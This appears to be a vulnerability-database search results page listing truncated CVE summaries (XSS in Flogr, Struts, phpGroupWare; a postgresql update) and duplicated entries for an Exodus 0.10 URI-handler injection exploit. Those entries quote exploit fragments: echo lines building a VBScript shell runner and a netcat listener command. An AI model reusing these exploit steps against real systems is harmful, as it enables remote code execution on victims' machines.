33 matches found
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in index.php in Flogr 2.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the PATHINFO or 2 an arbitrary parameter...
CVE-2012-4336
Multiple cross-site scripting XSS vulnerabilities in index.php in Flogr 2.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the PATHINFO or 2 an arbitrary parameter...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in component handlers in the javatemplates aka Java Templates plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of...
SuSE 11 / 11.1 Security Update : postgresql (SAT Patch Numbers 2457 / 2458)
This update of postgresql fixes several minor security vulnerabilities : - Postgresql does not properly check privileges during certain RESET ALL operations, which allows remote authenticated users to remove arbitrary parameter settings. CVE-2010-1975 - The PL/Tcl implementation in postgresql loa...
CVE-2009-4416
Cross-site scripting XSS vulnerability in login.php in phpGroupWare 0.9.16.12, and possibly other versions before 0.9.16.014, allows remote attackers to inject arbitrary web script or HTML via an arbitrary parameter whose name begins with the "phpgw" sequence...
CVE-2009-4416
Cross-site scripting XSS vulnerability in login.php in phpGroupWare 0.9.16.12, and possibly other versions before 0.9.16.014, allows remote attackers to inject arbitrary web script or HTML via an arbitrary parameter whose name begins with the "phpgw" sequence...
Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit
No description provided by source. !-- Exodus v0.10 remote code execution exploit by Nine:Situations:Group::strawdog This uses the "-l" argument to overwrite a file inside Microsoft Help and Support Center folders oh rgod... Firstly run netcat in listen mode to drop the vbscript shell run this...
Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit
Exploit for unknown platform in category remote exploits =============================================================== Exodus 0.10 uri handler Arbitrary Parameter Injection Exploit =============================================================== testfile echo Dim wshShell testfile echo Set...
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
Exodus 0.10 - URI Handler Arbitrary Parameter Injection 2 testfile echo Dim wshShell testfile echo Set wshShell = CreateObject"WScript.Shell" testfile echo wshShell.Run"cmd /c start calc" testfile echo ^ testfile nc -L -s 192.168.0.1 -p 5222 -vv click me click me milw0rm.com 2008-11-20...
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
testfile echo Dim wshShell testfile echo Set wshShell = CreateObject"WScript.Shell" testfile echo wshShell.Run"cmd /c start calc" testfile echo ^ testfile nc -L -s 192.168.0.1 -p 5222 -vv click me click me milw0rm.com 2008-11-20...
Exodus v0.10 uri handler arbitrary parameter injection
-------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installation bug...
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)
-------------------------------------------------------------------------------- Exodus v0.10 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installation bug...
Exodus 0.10 (uri handler) Arbitrary Parameter Injection Vulnerability
Exploit for unknown platform in category remote exploits ===================================================================== Exodus 0.10 uri handler Arbitrary Parameter Injection Vulnerability =====================================================================...